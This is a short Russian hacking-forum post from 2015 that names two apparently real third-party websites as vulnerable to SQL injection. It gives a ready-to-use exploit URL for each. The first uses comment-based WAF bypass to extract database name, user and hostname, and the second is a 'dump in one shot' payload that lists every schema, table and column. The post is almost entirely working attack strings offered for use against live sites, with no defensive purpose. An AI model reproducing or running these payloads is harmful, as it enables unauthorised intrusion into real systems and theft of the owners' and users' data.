Показать сообщение отдельно

  #2  
Старый 04.10.2015, 16:36
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами: 5595446

Репутация: 5
По умолчанию

Сайт: endividado.com.br

Уязвимость: SQLi

Эксплоит (с обходом WAF):

Код:
http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,@@tmpdir,database/*!(*/),current_user,@@hostname,6,7+--+
UPD DIOS

Код:
http://www.cardigan.ltd.uk/exhibitions-index.php?id=11' /*!50000union*/ select 1,2,/*!50000concat*/((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61) and  (@a)in (@a:=/*!50000concat*/(@a,0x3c6c693e,table_schema,0x203a3a20,table_name,0x203a3a20,column_name,0x3c62723e))))a)),4,5,6,7,8,9,10,11,12,13,14--+
 
Ответить с цитированием